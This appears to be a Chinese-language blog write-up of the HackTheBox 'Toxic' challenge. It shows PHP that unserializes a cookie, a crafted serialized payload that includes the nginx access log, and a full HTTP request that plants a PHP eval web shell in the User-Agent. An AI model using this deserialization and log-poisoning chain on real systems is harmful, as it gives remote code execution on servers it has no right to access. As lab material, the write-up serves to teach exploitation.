hackthebox-Toxic - writeup

由 admin 发布

Toxic

index.php

if (empty($_COOKIE['PHPSESSID']))
{
    $page = new PageModel;
    $page->file = '/www/index.html';

    setcookie(
        'PHPSESSID', 
        base64_encode(serialize($page)), 
        time()+60*60*24, 
        '/'
    );
} 

$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie);

默认包含 /www/index.html 页面

会对 COOKIE 进行反序列化操作

Payload 构造

将默认 PHPSESSID 值解码后为

O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

由于网站目录是没有 flag.php,根下的 flag 文件为 flag+随机字母,所以需要 getshell

修改pyaload,包含 nginx 日志

O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}

burp抓包,将 User-agent 修改为

GET / HTTP/1.1
Host: 209.97.187.76:31340
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 <?php eval($_GET['2']);?> AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ==
Connection: close

获取flag

Untitled

验证,已成功包含

获取flag

Untitled


暂无评论

发表评论